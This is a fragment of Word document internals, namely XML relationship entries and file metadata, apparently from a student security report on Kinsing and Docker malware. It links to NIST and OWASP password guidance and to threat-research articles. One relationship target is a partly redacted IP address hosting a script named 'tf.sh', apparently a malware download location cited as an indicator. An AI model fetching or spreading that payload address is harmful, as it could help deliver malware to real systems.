/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pages.nist.gov/800-63-3/sp800-63b.html" TargetMode="External" Id="R4aa8b105f1e544de" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html" TargetMode="External" Id="R965c028869c24b7b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image18.png" Id="R1136e163b45848dd" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image19.png" Id="Rf4a1a0923ef44e10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1a.png" Id="R6662b4bb1bce4657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1b.png" Id="R1fed8237997a4159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1c.png" Id="Rdad5df296bbb43ca" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1d.png" Id="R25a148f6d6594a25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://185.XXX.XXX.203/tf.sh" TargetMode="External" Id="R9747c89e8bf24e10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gbhackers.com/kinsing-malware-attack/" TargetMode="External" Id="Rb2737927cb48428b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1e.png" Id="R8c7bf98e8a3b48ed" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securityaffairs.co/wordpress/130973/cyber-crime/uptycs-docker-malware-attacks.html" TargetMode="External" Id="R14216b167e7045ba" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1f.png" Id="Rc1d4f894116b4469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gbhackers.com/kinsing-malware-attack/" TargetMode="External" Id="R2ef04a7d2972497b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image20.png" Id="Rec0c553848634fa2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces" TargetMode="External" Id="R12033ddf63704d7f" /><Relationship Type="http://schemas.microsoft.com/office/2020/10/relationships/intelligence" Target="intelligence2.xml" Id="Ref41abe4000546b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Jose RF</dc:creator>
  <keywords/>
  <dc:description/>
  <lastModifiedBy>Wolert Rafał (STUD)</lastModifiedBy>
  <revision>5</revision>
  <lastPrinted>2022-11-15T18:14:00.0000000Z</lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-15T17:57:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-19T22:33:42.1033990Z</dcterms:modified>
</coreProperties>
</file>